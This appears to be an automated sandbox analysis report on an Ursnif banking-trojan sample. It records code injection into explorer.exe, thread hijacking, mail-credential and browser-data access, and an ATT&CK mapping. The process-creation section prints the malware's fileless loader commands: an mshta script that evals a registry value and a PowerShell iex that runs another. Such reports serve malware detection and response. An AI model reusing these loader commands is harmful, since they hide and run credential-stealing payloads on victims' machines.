Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 2AE0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 93C000 value: 00
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: D70000 value: 80
Source: C:\Windows\System32\control.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Thread register set: target process: 2904
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 3352
Source: C:\Windows\System32\control.exe	Thread register set: target process: 6080
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440
Source: C:\Windows\explorer.exe	Thread register set: target process: 4544
Source: C:\Windows\explorer.exe	Thread register set: target process: 6088

Source: unknown

Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP"
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com

Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.485521161.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: control.exe, 00000015.00000000.463143370.00000227E4200000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.506162270.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 0000001E.00000000.542543993.000001B91D590000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000023.00000000.580775852.00000163C2A60000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000024.00000000.628221270.000001EAE2660000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000025.00000000.650127742.0000027740790000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000027.00000000.663930430.000002DE46F90000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000019.00000000.486258733.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C47A2E cpuid

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401E22 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_03C47A2E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Users\user\Desktop\FpYf5EGDO9.exe

Code function: 0_2_00401752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000003
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000006
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection812	Obfuscated Files or Information2	OS Credential Dumping1	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer4	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Software Packing22	Credential API Hooking3	Account Discovery1	Remote Desktop Protocol	Data from Local System1	Exfiltration Over Bluetooth	Encrypted Channel11	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
